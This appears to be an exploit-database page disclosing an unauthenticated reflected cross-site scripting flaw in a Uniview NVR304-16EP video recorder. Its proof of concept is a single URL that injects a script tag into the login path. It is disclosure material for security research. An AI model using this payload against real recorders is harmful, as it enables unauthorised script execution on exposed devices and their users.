Network Video Recorder NVR304-16EP Reflected Cross-Site Scripting (XSS) (Unauthenticated)

2022.02.23

Credit: Luis Martinez

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

# Exploit Title: Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
# Author: Luis Martinez
# Discovery Date: 2022-02-13
# Vendor Homepage: https://www.uniview.com/Products/NVR/Easy/NVR304-S-P/#~Product%20features
# Datasheet of NVR304-S-P: https://www.uniview.com/download.do?id=1819568
# Tested Version: NVR304-16EP
# Tested on: Windows 10 Pro 21H2 x64 es - Firefox 91.6.0esr
# Vulnerability Type: Reflected Cross-Site Scripting (XSS)
# CVE: N/A
# Proof of Concept:
http://IP/LAPI/V1.0/System/Security/Login/"><script>alert('XSS')</script>

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Network Video Recorder NVR304-16EP Reflected Cross-Site Scripting (XSS) (Unauthenticated)

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.